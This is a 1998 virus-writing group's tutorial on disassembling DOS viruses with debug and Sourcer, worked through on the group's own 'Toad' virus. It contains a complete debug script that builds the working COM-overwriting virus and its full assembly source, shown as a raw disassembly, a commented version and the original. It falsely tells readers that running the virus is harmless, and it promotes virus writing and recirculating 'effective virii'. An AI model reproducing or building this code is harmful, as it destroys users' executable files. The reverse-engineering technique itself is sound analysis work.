Reverse Engineering: The Viral Approach.
By HornyToad & Opic
A CodeBreakers Production,
(C) 1998 (
http://www.Codebreakers.org)


Technology is advancing at an alarming rate everyday. In order to keep up with the mainstream, industry programmers have had to utilize software reverse engineering to stay abreast of important advances. In a world of a million buzz words, 'reverse engineering' has made a place for itself as a respectable activity. Chuckling, I wonder if a thief will eventually be called an acquisition technician. Reverse engineering is simply a method of prying into software to steal other programmer's techniques. We're not passing judgement on this practice, quite the contrary, We're very proud to be an "engineers". In the field of virus writing and cracking, however, we tend to use the word disassembly more often than reverse engineering.

As the title indicates, the majority of this text will be devoted to sparking interest in disassembling virus code. Disassembly can also be very helpful to the cracker and in general any professional programmer. The cracker might use the disassembled code to extract and change passwords and access privileges. The professional programmer will most likely be using the reverse engineering techniques to view others techniques and advances in programming. The virus writer will most likely be following in the footsteps of the professional programmer. Who knows that professional programmer might be a virus writer. Lets face it, if you want to learn how to program, do you want to rely on a boring underpaid teacher to inspire you? Or, would you like to learn how to program by creating a virus or hacking program? Trust me, virus writing is fascinating and challenging.

The art of virus disassembly and examination has been a practice covered in a veil of ambiguity for quite a long time in the virus (and even more so in the anti-virus) community. And there is a logical reason for this when you consider it;

On the side of the VX community:

"If anyone knows how to disassemble and debug my virus, they can learn my techniques (which many virus writers don't want) as well as the fact that AV can more easily scan for and disinfect the virus after examination."

On the side of the AV:

"If people understand how viruses work, and can even write their own disinfection routines, or remove a virus infection manually then the mystical hysteria that a viral infection brings can no longer be used to my advantage to sell my anti-virus product" (cough-cough-mcafee-cough-cough).

So no matter which side of the fence you stand on it should be clear that virus disassembly should be a major part of your viral studies. If you are a member of the AV community and find it yourself in conflict with the fact that you are learning or reading this tutorial which comes from the side of the VX, take heart! The AV community will teach you the exact same thing that we are teaching you in this tutorial...**for a price** (as usual) 600 pounds is the last figure we saw for a cute little luncheon with a complimentary diskette with some virus from the 80's and some shareware AV program. So take your pick, we personally find the VX side to be more noble working in the pursuit of knowledge, as the AV works in pursuit of all encompassing '$' sign.

The virus community has undergone many changes in the past 10 years. In the beginning, darkness covered the abyss... This beginning passage from the Bible described the state of virus source code in the late 80's and early 90's. The push in the virus community was to release virus executables, rather than the revealing source code. Therefore, in order for the knowledge to spread throughout the underground, coders relied on disassemblies. Disassemblies were often very crude in those days and rarely worked. They did, however, shed light on the virus writer's strategy, which, for the most part, was enough to guide beginners in the right direction. Over the years, the focus of the virus community has changed. Currently, the most common practice is to publish source code along with the executable. In fact, many virus writers prefer to publish only the source code. The intellectual advances are becoming more important to the coders than the destructive actions of the executable. We prefer to see the coder's original source, rather than an executable. Even though we have a test machines for watching how a virus works, viewing the original source is the most precise method to learning the virus writer's techniques.

Unfortunately, this change in strategy, releasing the source code, has led to the weakening of disassembly skills, primarily in the use of the debugger. A debug program is one that allows you to manipulate and view memory locations, registers, and individual program instructions. The DOS debug program is a powerful tool for prying open executables and exploiting the source code. We must footnote that a thorough knowledge of assembly language is necessity in order to fully exploit debug. This article assumes that you are familiar with the basic assembly instructions. Our primary goal in writing this article is to spawn interest in the reader to disassemble executables. Don't be afraid to uncover the secrets of the original programmer.

Debug

There are many fine disassemblers out on the market. If you are willing to pay the big bucks, take a look at such programs as Sourcer, IDA, and SoftIce. Before you go out there and spend a lot of money on a big name program, take a look at the one that you already have, Debug. No, we're not crazy. Look in your \windows\command directory. We'll bet it's there. If not, do a search of your dos files, it's hiding somewhere on your drive. Go to a dos prompt and type debug. You should see the debug prompt "-" on the next line. Debug is loaded into memory and is ready to use. To quit out of debug, press "Q" then <enter>.

Lets first take a quick look at the debug commands:

*Hint* All numbers passed to debug are assumed to be hex. You do not need to add the "h" at the end of the number. We would recommend buying a calculator that handles hex conversion.

*Hint* Please find a copy of the MS-DOS Users Guide. It is very helpful for learning some of the basics about DOS operations. It also contains a very informative guide to debug usage. All of the debug commands are explained with examples. A must for your library!

(A)ssemble - Allows you to input assembly statements and translates "A" and press <enter>. You will be returned an address in the form of segment:offset. The default offset for this command is 100.

(C)ompare - In order to compare two areas of memory, type "c memLocA range memLocB". This command defaults with the data segment. The memory contents will be displayed side by side.

(D)isplay - Used simply to view a memory location. Again the default register is DS for this command, but you can specify any segment you want. For example, "-D CS:100 <enter>", displays 80 hex bytes (default) beginning at CS:100. The length can be specified other than the default by including "L<length>" in the command line, for example, "-D CS:100 L100".

(E)nter - Allows you to enter data or machine code into a specified location. Typing:

E cs:100 B4 4E 33 C9 BA 2F 01 CD 21 72 1B B8 02 3D BA 9E

will enter this line of code starting at address cs:100.

(F)ill - Useful for filling a memory location with a specified value. Type:

-f 100 500 'Codebreakers Rule!'

This will fill the memory locations from 100 to 500 with some important words to remember. Type 'd 100' to see them.

(G)o - Executes the program loaded into memory to a specified breakpoint.

(H)exadecimal - This is your handy dandy hex calculator. Enter 'H <valueA> <valueB>', and debug will return the hex sum and difference of the two values. Very useful!

(I)nput - displays a byte from a port address.

(L)oad - Very useful command! This command allows you to load a program or disk sectors into debug. "-L <filename>" loads a file into memory. "-L <address> <drive> <startSector> <length>" or "-L 100 0 10 20" loads from drive A(0) to CS:100, sector 10 and displays 20 sectors. Obviously the default for this command is CS.

(M)ove - moves contents of one location to another. Default is DS. Syntax: -m ds:100 l50 DS:300 This will move from ds:100, 50 bytes to location ds:300.

(N)ame - Names a file that you entered.

(O)utput - Sends a byte to a port.

(P)roceed - Executes through a routine.

(Q)uit - Quits debug.

(R)egister - Displays the registers and the next instruction.

(S)earch - Searches a specified range through default DS for a "string" or data entity. Returns location if found.

(T)race - Begins executing a program in single step mode. A range can be specified.

(U)nassemble - Produces assembly instructions for a specified range or simply 32 bytes when unspecified. Default is CS.

(W)rite - Writes a (N)amed file to disk, in essence, this is your save command.

We think that the best way to learn how to use debug is through a practical example. In general people always learn faster when they have hands-on training. Well, that's what you are going to get. And guess what, you are going to perform your first virus disassembly! We have specifically chosen a small uncomplicated virus for this first example. Below, you will see a debug script to create an instructional virus from the CodeBreakers VX magazine. Study the commands. The first line (N)ames a program called TOAD.COM starting at CS:100. As you can see, the next several lines (E)nter machine code until CS:01B4. The line, "RCX" and subsequent line, "00B4" loads the program length into CX. When in doubt as to the length of the program, look at the offset at the beginning of the line, in this case 01B0. Then count single bytes across to the final piece of code entered,"24", 4 bytes across. Easy. The next line (W)rites the program (TOAD.COM). The final line quits out of debug. We hope that you are already realizing the wealth of information that you can get from using the debug program. Save the information below in a file called "toad.txt". At a dos prompt, type: "debug toad.txt <enter>". Debug will then execute the instructions in toad.txt and present you with a functional virus, toad.com. Do not worry about this virus spreading and destroying your system, it won't. This a very simple com overwriting virus. Follow my instructions and nothing will happen.

 N TOAD.COM
 E 0100 B4 4E 33 C9 BA 2F 01 CD 21 72 1B B8 02 3D BA 9E
 E 0110 00 CD 21 93 B4 40 B9 B4 00 BA 00 01 CD 21 B4 3E
 E 0120 CD 21 B4 4F EB DC B4 09 BA 35 01 CD 21 CD 20 2A
 E 0130 2E 63 6F 6D 00 43 6F 6E 67 72 61 74 75 6C 61 74
 E 0140 69 6F 6E 73 21 20 59 6F 75 20 68 61 76 65 20 69
 E 0150 6E 66 65 63 74 65 64 20 61 6C 6C 20 74 68 65 20
 E 0160 43 4F 4D 20 66 69 6C 65 73 20 69 6E 20 74 68 69
 E 0170 73 20 0A 0D 64 69 72 65 63 74 6F 72 79 20 77 69
 E 0180 74 68 20 74 68 65 20 54 6F 61 64 20 69 6E 73 74
 E 0190 72 75 63 74 69 6F 6E 61 6C 20 76 69 72 75 73 2E
 E 01A0 20 48 61 76 65 20 61 20 6E 69 63 65 20 64 61 79
 E 01B0 2E 0A 0D 24
 RCX
 00B4
 W
 Q

In a way, I cheated by giving you the machine code to the virus ahead of time. Normally, the task of the disassembler (coder) would be to produce source from only the executable. Anyway, now that you have the working virus executable, lets get to work. Load toad.com into a debug session by typing:

A:\debug toad.com         <-    type
-                         <-    debug prompt (ready for action)

Remember that executable code begins after the <P>rogram <S>egment <P>refix at CS:100. What we therefore need to do is view the <R>egisters and find out the length of toad.com. Typing "r" at the debug prompt, allows you to see the values of the registers. The important one that we are looking for first is the initial value of CX. CX holds the length of the program. In this case B4 (or 180) bytes. Take a moment to study the different registers. Notice that the "r command also printed the assembly code for the first instruction. 278E:0100 is the segment:offset address for CS:100, or the beginning of the program. Notice also that the IP is set to 100. "B44E" disassembles to the assembly instruction "MOV AH,4E".

 -r
 AX=0000  BX=0000  CX=00B4  DX=0000  SP=FFFE  BP=0000  SI=0000  DI=0000
 DS=278E  ES=278E  SS=278E  CS=278E  IP=0100   NV UP EI PL NZ NA PO NC
 278E:0100 B44E          MOV     AH,4E
 -

Now that we have the length of the program, we can <D>isplay, or dump the program's machine code to the screen. This is accomplished by <D>isplaying from CS:100 for a <l>ength of b4. Observe below that the data portion of the virus follows directly after the executable portion. This is the first clue that we have as to the offset for the data structure. From the beginning of the data portion of the code, any assembly instructions that debug "translates" for you will be bogus. Type:

 -d cs:100 lb4

278E:0100  B4 4E 33 C9 BA 2F 01 CD-21 72 1B B8 02 3D BA 9E   .N3../..!r...=..
278E:0110  00 CD 21 93 B4 40 B9 B4-00 BA 00 01 CD 21 B4 3E   ..!..@.......!.>
278E:0120  CD 21 B4 4F EB DC B4 09-BA 35 01 CD 21 CD 20 2A   .!.O.....5..!. *
278E:0130  2E 63 6F 6D 00 43 6F 6E-67 72 61 74 75 6C 61 74   .com.Congratulat
278E:0140  69 6F 6E 73 21 20 59 6F-75 20 68 61 76 65 20 69   ions! You have i
278E:0150  6E 66 65 63 74 65 64 20-61 6C 6C 20 74 68 65 20   nfected all the
278E:0160  43 4F 4D 20 66 69 6C 65-73 20 69 6E 20 74 68 69   COM files in thi
278E:0170  73 20 0A 0D 64 69 72 65-63 74 6F 72 79 20 77 69   s ..directory wi
278E:0180  74 68 20 74 68 65 20 54-6F 61 64 20 69 6E 73 74   th the Toad inst
278E:0190  72 75 63 74 69 6F 6E 61-6C 20 76 69 72 75 73 2E   ructional virus.
278E:01A0  20 48 61 76 65 20 61 20-6E 69 63 65 20 64 61 79   Have a nice day
278E:01B0  2E 0A 0D 24                                       ...$
-

In both the above listing and below, it is easy to determine the end of the program instructions. In this case, find the CD 20 (int 20) instruction which terminates the virus. Directly after the CD 20 at location CS:012D, the first sign of a data portion appears, hex 2A, the * character.

                          
 -u cs:100 l2f
 278E:0100 B44E          MOV     AH,4E
 278E:0102 33C9          XOR     CX,CX
 278E:0104 BA2F01        MOV     DX,012F
 278E:0107 CD21          INT     21
 278E:0109 721B          JB      0126
 278E:010B B8023D        MOV     AX,3D02
 278E:010E BA9E00        MOV     DX,009E
 278E:0111 CD21          INT     21
 278E:0113 93            XCHG    BX,AX
 278E:0114 B440          MOV     AH,40
 278E:0116 B9B400        MOV     CX,00B4
 278E:0119 BA0001        MOV     DX,0100
 278E:011C CD21          INT     21
 278E:011E B43E          MOV     AH,3E
 278E:0120 CD21          INT     21
 278E:0122 B44F          MOV     AH,4F
 278E:0124 EBDC          JMP     0102
 278E:0126 B409          MOV     AH,09
 278E:0128 BA3501        MOV     DX,0135
 278E:012B CD21          INT     21
 278E:012D CD20          INT     20

It is important that you are aware of what bogus assembly instructions look like. This is where an understanding of basic assembly is required. Take a look below at code before the break. It is easy to decipher what the actual instructions are. You might even recognize what the virus is doing from this little snip of code. Then, after the int 20, all hell breaks loose. What the hell is this "sub ch,[6f63]" ? What an eye sore! When code begins to look like this, you are going to be forced to draw a conclusion: 1. The code segment has ended. 2. The data segment might be starting. 3. We may be dealing with code polymorphism or encryption. There are other possibilities, but for the sake of the beginner, at a minimum, recognize that a change has occurred.

                             
 278E:0122 B44F          MOV     AH,4F
 278E:0124 EBDC          JMP     0102
 278E:0126 B409          MOV     AH,09
 278E:0128 BA3501        MOV     DX,0135
 278E:012B CD21          INT     21
 278E:012D CD20          INT     20
 -------------------------------------------------------------
 278E:012F 2A2E636F      SUB     CH,[6F63]
 278E:0133 6D            DB      6D
 278E:0134 00436F        ADD     [BP+DI+6F],AL
 278E:0137 6E            DB      6E
 278E:0138 67            DB      67
 278E:0139 7261          JB      019C
 278E:013B 7475          JZ      01B2
 278E:013D 6C            DB      6C
 278E:013E 61            DB      61
 278E:013F 7469          JZ      01AA

Once you are comfortable with moving around a program within debug, it is now time to formulate an intelligent looking disassembly. We'd like to classify disassembly into two different forms, the utility disassembly and the work of art. The utility disassembly is when someone simply copies the debug output into a file and gives it an asm extension. This code can look quite ugly and may not even work. The work of art is when someone includes assembler specific instructions to the asm file, gives meaningful symbolic names, translates data, and comments the code. For example:

1. Assembler specific instructions:

If you are using TASM, for example, and the virus is of COM file type, include such directives as:

 code    segment
	 assume  cs:code,ds:code
	 org     100h
	  :
	  :
 code    ends
	 end     start

You might even want to include TASM compile instructions like:

     ;TASM nameOfVirus.ASM
     ;TLINK /t nameOfVirus.OBJ

Including the above instructions/structures to the code will aid people who might not be TASM literate in assembling the virus.

2. Meaningful symbolic names:

During disassembly, whether through debug or an expensive disassembler, symbolic names of procedures, labels, and variables are lost. Debug translates them as actual memory addresses. Disassemblers often assign them with meaningless names like "loc_1". Take a look at the examples below. Which one of them would be easier for a beginner to understand? They both accomplish the same end result, although, the code on top, is more self-explanitory and is easier for the beginner to understand.

 find_first:
	 mov     ah,4eh
	 xor     cx,cx
	 lea     dx,comFile
	 int     21h
	 jc      outMessage
 or

 loc_1:
     mov ah,4Eh
     xor cx,cx
     mov dx,12Fh
     int 21h
     jc loc_2

3. Translate data:

Once more, which one looks better? Enough said. It might be tedious breaking out the ASCII code chart and translating the data section, but when someone looks at your disassembly, they will appreciate it.

 db '*.com', 0
 db 'Congratulations! You have infect'

 or

 db  2Ah, 2Eh, 63h, 6Fh, 6Dh, 00h, 43h, 6Fh, 6Eh, 67h, 72h, 61h
 db  74h, 75h, 6Ch, 61h, 74h, 69h, 6Fh, 6Eh, 73h, 21h, 20h, 59h
 db  6Fh, 75h, 20h, 68h, 61h, 76h, 65h, 20h, 69h, 6Eh, 66h, 65h
 db  63h, 74h

4. Comment your code:

We have had many programming teachers say that you can never put too many comments into your code. We have heard an equal amount say that there only need to be a few concise comments. Its a never ending battle. We would tend to recommend including more comments in than not enough. Many beginners are given the advice that, in order to learn assembly, you have to study source code. That's fine and dandy, but when you're not necessarily comfortable with assembly, looking at naked code can give you a headache. Try to provide enough comments so that the beginner can understand how each line fits in to the program's operation. For example:

 
 mov ah,3Eh           ;function 3Eh-close file
 int 21h              ;go dos!

 mov ah,4Fh           ;function 4Fh-find next file
 jmp find_file        ;jump to find next file to infect

Essentially, that's all there is to it. Extract the assembly instructions and data through the use of debug into an asm file. Tidy the code up, add comments and turn the file into a work of art by following the few pointers that we stated above. We realize that this is very short and sweet, but in order to include everything about debugging operations, We would need to write a book. There are many more techniques which need to be implemented to counteract anti-debugging techniques. Thankfully, many of the more powerful disassemblers on the market today can defeat the majority of anti-debugging techniques. After trying hard to sell you on debug, We have to admit that we more often use Turbo Debugger by Borland for viewing code. Essentially, both programs accomplish the same thing. But, Turbo Debugger's delivery is very sweet. As you trace through your code, in separate windows you can view the flags and registers changing dynamically. There is a window in the lower right-hand corner of the screen that allows you to view the stack as values are pushed and popped off of it. Breakpoints are easy to set, so that you can execute your program up unto a certain point, checking the registers and flags to see the results. All in all, Turbo Debugger is a fascinating program and learning tool. We highly recommend it.

Now, lets take a quick look at the same virus executable, but this time we'll put it under a slightly different microscope: a disassembler. What do we need to get started? We are going to start out with the most simple and effective set up we can. So first things first; go collect the tools that you don't have from the list below. Tools we need:

1)A good disassembler (duh) or two. Many people will argue that this disassembler is better then that one and this one sucks because that one...blah,blah,blah, Your Boring us! The fact is that a disassembler program is a tool: just a tool. You use it WITH your intellect and can make it as valuable or as worthless as you wish. There are a lot of disassemblers out there but this is the one we are going to be working with because first of all it is relatively easy to use and second is fairly accurate and widely available:

Sourcer 7.0 (or higher) if you can acquire it. Our other suggestion is probably an even better disassembler: IDA. But it is much more difficult to acquire, and is VERY large in size, you may feel free to try the demo version but you will not be able to save your disassemblies (very cheap on their part) so we choose not to use examples from it in this tutorial. However, we would suggest that you cross reference (double-check) your disassemblies from Sourcer with that of IDA's as well as through a debugger. This will help you in recreating a more precise disassembly.

2)The Ralf Brown Int list-this is IMPERATIVE in disassembly!

You can acquire these at:

http://www.cs.cmu.edu/afs/cs.cmu.edu/user/ralf/pub/WWW/files.html

or:

http://www.simtel.net/pub/simtelnet/msdos/info/

(the file intwin**.zip -currently intwin57.zip...still updating)

3)TOAD.COM -overwriting virus which can be found in debug script in the debugging portion of this tutorial or from Codebreakers VX Zine #1 available at:

http://www.codebreakers.org.

Alright now we are going to start from the ground up. What is a disassembly? Simply it is drawing the source code of an executable program from the program itself. This is EXTREMELY useful in learn programming tricks and examining code that you do not understand and do not have the source code to. It is even more useful to the virus writer whom can acquire through WWW or his/her contacts a copy of just about any virus in executable form,but which coming across source code to can be impossible.

Now let us interject some of the problems we see today with most virus disassemblies and what it truly means to do a disassembly. Most viral disassemblies that you will download off the net are very very sloppy code which in almost any instance wont even compile (and often if they will, will function NOTHING like the original virus did). This is due to usually one simple factor: the executable was run through a disassembler without being examined, corrected, altered etc. In other words the person doing the disassembly just ran it through the program and zipped it up.This is a almost useless and definitely fruitless practice which we would like to see an end to. What does it mean to do a "real" disassembly? Well the most accurate disassemblies are done through debug with notepad open recording step by step what the virus does. BUT, many of us do not have the time to do such disassemblies, and we will argue that a disassembly done through one of today's disassembler programs combined with some foot work on the part of the rev engineer mixed with a bit of debugging (to clarify the gray areas of the disassembly) can do AS good if not a BETTER job,as the 100% debug route.

The three most important aspects of doing a disassembly of a program are:

  1. Know how to set the options on your disassembler to create the most accurate disassembly possible.
  2. Having another disassembler and debugger to cross reference with (I.E:alot of disassemblers make errors and it is good to use more then one to get a more accurate "picture" of the program you are disassembling.
  3. Do NOT just leave the disassembly as it lies when it comes out of the disassembler. The ASM file that comes from the disassembler is the RAW material from which we will sculpt a working functioning likeness of the original virus from. We will need to clean it up, get rid of junk inserted by the disassembler, get rid of locational numbers, and give labels more descriptive names. And while we are doing that we will intuitively begin to get a better sense of the virus we are disassembling. You should have the Ralf Brown files open during your entire "cleaning process" to refer to.

Constantly double check strange int's and sub-functions, make the code "human" again. We find the easiest way to illustrate this process is to show you it step by step. We will show you examples from Sourcer 7.0, what settings and options we have chosen, and how they look in their RAW form straight from the disassemblers.

1)Disassembly of TOAD.COM using Sourcer 7.0 Settings:

Input file:TOAD.COM

Target assembler: TASM 5.0 (We know that TASM was what was used to originally assemble this virus, so we will choose the most current version of tasm as a newer version almost always supports code from older versions but not visa versa. It is worthwhile to investigate what assembler the author of the virus you are disassembling preferred as it will aid you in your entire disassembly.

Also choose: (functional match).

Output filename: TOAD.ASM

File format: press F so that output displays .asm is displayed so we can do away with those annoying segment addresses and what not Sourcer will otherwise insert.

Remarks:all. why not? Lets see what Sourcer can help us with.

Label type: We choose decimal, they are all annoying but this one is easiest for me, this is pretty much just preference here.

OK, thats a pretty decent setup for Sourcer, lets see what it came up with:

 ---------------------------------------------------------------------------

PAGE  59,132

;UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU
;UU                                                                      UU
;UU                             TOAD                                     UU
;UU                                                                      UU
;UU      Created:   19-Oct-97                                            UU
;UU      Passes:    5          Analysis Options on: none                 UU
;UU                                                                      UU
;UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU

target          EQU   'T5'                      ; Target assembler: TASM-5.0

include  srmacros.inc


; The following equates show data references outside the range of the program.

data_1e         equ     9Eh

seg_a           segment byte public
		assume  cs:seg_a, ds:seg_a


		org     100h

toad            proc    far

start:
		mov     ah,4Eh                  ; 'N'
loc_1:
		xor     cx,cx                   ; Zero register
		mov     dx,12Fh
		int     21h                     ; DOS Services  ah=function 4Fh
						;  find next filename match
		jc      loc_2                   ; Jump if carry Set
		mov     ax,3D02h
		mov     dx,data_1e
		int     21h                     ; DOS Services  ah=function 3Dh
						;  open file, al=mode,name@ds:dx
		xchg    bx,ax
		mov     ah,40h                  ; '@'
		mov     cx,0B4h
		mov     dx,100h
		int     21h                     ; DOS Services  ah=function 40h
						;  write file  bx=file handle
						;   cx=bytes from ds:dx buffer
		mov     ah,3Eh
		int     21h                     ; DOS Services  ah=function 3Eh
						;  close file, bx=file handle
		mov     ah,4Fh                  ; 'O'
		jmp     short loc_1
loc_2:
		mov     ah,9
		mov     dx,offset data_4        ; ('Congratulations! You hav')
		int     21h                     ; DOS Services  ah=function 09h
						;  display char string at ds:dx
		int     20h                     ; DOS program terminate
		db      '*.com', 0
data_4          db      'Congratulations! You have infect'
		db      'ed all the COM files in this ', 0Ah
		db      0Dh, 'directory with the Toad ins'
		db      'tructional virus. Have a nice da'
		db      'y.', 0Ah, 0Dh, '$'

toad            endp

seg_a           ends



		end     start
----------------------------------------------------------------------------

O.K, not bad, not bad at all really. If we like we can attempt to recompile this code and see if it compiles and runs properly. It looks fairly legible, so what we can do is run it through IDA to see if we get any differences in code construction or content. While we may not see much here because this is a simple overwriting virus, We can assure you that you will see it in more complex code (We will talk about some common disassembler flaws and errors later on). Go ahead and run Toad.com through the demo version of IDA (if you have it) and you'll see very little variation in code. Which means we can move on to the next step of cleaning and commenting the code. Here is the code after we have sifted through it removed the junk Sourcer includes and renaming locations and data labels as well as clearing up odd bits of code.

----------------------------------------------------------------------------
;**************************************************************************
;                  TOAD Overwriting Virus 
;
;           Disassembly By Opic [CodeBreakers '98]
;
;                Recompilable with TASM/TLINK
;
;NOTES: TOAD is a simple .COM overwriting virus. I have little to say about
;this virus as it is very uninteresting by nature, and has little value
;other then as an instructive device.
;**************************************************************************

virus           segment byte public
		assume  cs:virus, ds:virus
		org     100h
toad            proc    near                    ;was far, disassembler 
						;incosistancy


start:                                          ;start of virus code
		mov     ah,4Eh                  ;function 4eh-find first file
find_file:
		xor     cx,cx                   ;clears CX register
		mov     dx,filespec             ;12Fh points to  *.com so
						;well just rename it with
						;a label to make life easier

		int     21h                     ;go DOS!
		jc      no_more_files           ;If there are no more files
						;to infect (i.e. if carry 
						;flag is set) then jump here

		mov     ax,3D02h                ;open file for read/write acess
		mov     dx,9eh                  ;get file info
						;ok heres a small difference
						;in the disassembly...in which
						;sourcer had mov dx,data_1e
						;data_1e being: 9eh
						;so lets just cut out the 
						;middle man (as the author
						;probably did......
		int     21h                     ;Go dos!
						; 
		xchg    bx,ax                   ;puts file handle in bx from ax  
		mov     ah,40h                  ;function 40h-write to file 
	
		mov     cx,offset end_virus - offset find_file

						;this is the length we want to
						;write to the file we are
						;infecting...it is the same as
						;mov cx,0B4h which the length
						;of our virus from 100h (start
						;of .com file)
		lea dx, start                   ;esentially again the same
						;command we are just making it
						;more 'human' for the reader
						;this is telling us to start
						;writing from the 'start' label
						;which is conviently located at
						;100h thus same as: mov dx,100h

		int     21h                     ;go dos!
		mov     ah,3Eh                  ;function 3Eh-close file
		int     21h                     ;go dos! 
						  
		mov     ah,4Fh                  ;function 4Fh-find next file
		jmp     find_file               ;jump to find next file to
						;infect
no_more_files:
		mov     ah,9                    ;function 9-write string to
						;standard output. ie: write a
						;message on the screen
		mov     dx,offset message       ;get the message from the 
						;data segment
		int     21h                     ;go dos! 
						;  
		int     20h                     ;int 20h-DOS program 
						;terminate
filespec        db      '*.com', 0
message         db      'Congratulations! You have infected all the COM files in 
this ',10,13, 
		db      'directory with the Toad instructional virus. Have a nice 
day.',10,13,'$' 

;here we just put the message back together in more cohesive order and changed
;the hex from 0Ah, 0Dh to its logical same: 10,13.
		     
end_virus label near                 ;just our   
				     ;formal closings
toad            endp                   
seg_a           ends
		end     find_file    ;makes sense yes?  
---------------------------------------------------------------------------- 

Now you see? It looks very clean and is even more legible then the code produced by Sourcer. All we have really done is given expressive labels to some code that was either given a generic label such as: data_1e or given code expressed in hexadecimal such as 0B4h with the expressive label: offset end_virus - offset find_file. We have also corrected any small syntax errors which Sourcer may have produced. This is the point at which we need to double check that the code compiles and the virus runs and infects properly. If bugs are encountered we can use debugger to walk through the executable step by step to see where we have strayed from the original source and where specifically our errors lie. Alright, now it's time for the big test, lets compare our disassembly with Horny Toad's original source and see how it compares.

 ----------------------------------------------------------------------------

 code    segment
	 assume  cs:code,ds:code
	 org     100h
 toad    proc    near

 first_fly:
	 mov     ah,4eh
 find_fly:
	 xor     cx,cx
	 lea     dx,comsig
	 int     21h
	 jc      wart_growth

 open_fly:
	 mov     ax,3d02h
	 mov     dx,9eh
	 int     21h

 eat_fly:
	 xchg    bx,ax
	 mov     ah,40h
	 mov     cx,offset horny - offset first_fly
	 lea     dx,first_fly
	 int     21h

 stitch_up:
	 mov     ah,3eh
	 int     21h
	 mov     ah,4fh
	 jmp     find_fly

 wart_growth:
	 mov     ah,09h
	 mov     dx,offset wart
	 int     21h

 cya:   
	 int     20h


comsig  db      "*.com",0
wart    db      'Congratulations! You have infected all the COM files in this 
',10,13
	db      'directory with the Toad instructional virus. Have a nice 
day.',10,13,'$'
 horny   label   near
 toad    endp
 code    ends
	 end     first_fly

 -----------------------------------------------------------------------------

Ahh...you see? Identical! that's right, Using the executable file TOAD.COM I have derived the original source code instruction for instruction. As you have probably already guessed this feat increases in difficulty exponentially with the complexity of the virus you are disassembling, however using the same intuition we used to clean up this code we can create logical patches and fixes in sections of the code produced by the disassembler which would otherwise not function properly. This is the area of disassembly when using a secondary disassembler and debugging come in very handy in finding the problem areas created by the initial disassembly. A true and accurate disassembly should incorporate a debugger verifying the majority of code produced by the disassembler.

Other things to be aware of:

There are a few other things we'd like to touch on before we draw this to a close. The first is simply that especially when doing reverse engineering it is important to understand the ways a virus, or any program for that matter functions on a 'technical' level. By this we mean you should understand simple concepts that a surprising amount of coders do not fully understand; i.e. understanding hexadecimal values, segment addresses, and other basic aspects of 8086 architectural structure. We mention these because it is very likely that you will run into some difficulty in making a disassembly due to this very fact. Allow me to illustrate with a simple example:

Suppose you came across this line of code in a disassembly:

mov dx,12Fh

o.k. so we know we are moving something to the data register from 12Fh so we go to 12Fh in the data segment and we find:

 seg000:012F   db 2Ah
 seg000:0130   db 2Eh
 seg000:0131   db 63h
 seg000:0132   db 6Fh
 seg000:0133   db 6Dh
 seg000:0134   db 0

WTF is that? This is the point where most new coders stop and say "Fuck it anyways!" and it can be frustrating to see 50-200 lines of this, but with a bit of luck we can make this fall into place. Its really simply just ASCII text in hexadecimal form! Watch:

 db 2Ah ;*
 db 2Eh ;.
 db 63h ;c
 db 6Fh ;o
 db 6Dh ;m

 db 0   ;0

Of course! Its the filespec db '*.com',0 the type of file we are searching for. It was simply the form that it was presented to us that was confusing. That is what much of reverse-engineering is about: taking the code OUT of the machine language and putting it BACK in to a moreunderstandable human language. As for converting hex to ASCII and visa versa many dissemblers will do it for you, some will not, in any case it proves worthwhile to get a good book on assembly which will provide you with hex to ASCII conversions.

Another thing to be aware of is some common errors made by disassemblers. One such error is when the disassembler decides to translate a block of assembly instructions in a block of data. When viewed, the block will look like a chunk of useless meaningless data. Unfortunately, that chunk of "data" might be as important as a interrupt handler. The key in understanding, or shall I say translating, the data will be to look at the program code. Think to yourself: "What is missing in the program? How and when is the chunk of data being called?" You might even have to take a look at it through a debugger and even possibly encapsulate the code with breakpoints to see what it actually affects. In the end, you only option might be to substitute the "data" with your own assembly instructions. Be very careful when attempting to do this.

And yet another important fact to keep in mind when examining viruses is that many viruses quite literally do NOT want to be examined. That is to say; they have been programmed with many anti anti-virus, anti-heuristic, anti-debugger, and anti-disassembler routines which make examination a even more difficult process, and sometimes even a risky one. The same rule we learned as a child when dealing with wild animals applies here: If you cannot identify an animal don't get close enough to let it harm you. This is a pretty safe rule to live by, but I'm sure some of you wont live by it, as we didn't, as a child and now ;) But you should keep yourself on top of ideas and advances in armored programming. Most times armored programming is not harmful but just creates an immense amount of difficulty in examining the code, however we have heard of and seen some pretty nasty tricks laid inside virii waiting for the Anti-virus researcher to examine, such as hooking int 3 (which is an essential int when examining programs in debug) and redirecting the debugger (when run upon the virus) to do anything...some from simply displaying a witty message onto the debug screen and then exiting without allowing the code to be examined all the way to wiping entire disks. Though it is fairly rare to come across a virus that will actually punish the reverse engineer, they do exist and we felt the necessity to inform you of their existence. Be smart, use your background knowledge of the virus you are examining, and we're sure that the beast won't bite back.

Hopefully, this has prepared you to begin doing quality disassemblies of virus code. You will learn ALOT about assembly language doing them, and you will be contributing to the VX community by making precise source code to popular and effective virii available again, for others to learn from and build upon. So until next time viewing audience; The computer is a wonderful microcosm in which man can play god. Is the AV holding the hands of evolution back? Ask Darwin.

- Horny Toad and Opic [Codebreakers '98]